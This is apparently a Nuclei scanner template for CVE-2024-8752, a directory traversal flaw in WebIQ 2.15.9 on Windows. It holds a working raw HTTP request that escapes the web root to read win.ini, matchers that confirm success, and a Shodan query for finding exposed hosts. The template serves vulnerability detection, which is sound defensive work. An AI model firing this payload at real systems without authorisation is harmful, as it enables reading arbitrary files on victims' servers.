37 lines
1.2 KiB
YAML
37 lines
1.2 KiB
YAML
id: CVE-2024-8752
|
|
|
|
info:
|
|
name: WebIQ 2.15.9 - Directory Traversal
|
|
author: s4e-io
|
|
severity: high
|
|
description: |
|
|
The Windows version of WebIQ 2.15.9 is affected by a directory traversal vulnerability that allows remote attackers to read any file on the system.
|
|
reference:
|
|
- https://www.tenable.com/security/research/tra-2024-38
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-8752
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2024-8752
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: webiq
|
|
product: webiq
|
|
shodan-query: title:"WebIQ"
|
|
tags: cve,cve2024,webiq,lfi
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /.webui/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains_all(body,"bit app support","fonts]","extensions]")'
|
|
- 'contains(content_type,"image/svg+xml")'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
# digest: 490a0046304402201580a4d7f7abeae964cd5bec291623be5f2e8d3982368479314f5c815be15f68022040027c66268dd71398b5a221c3aeecdc0360e9c53527b43c40f1b17be015bf5e:922c64590222798bb761d5b6d8e72950 |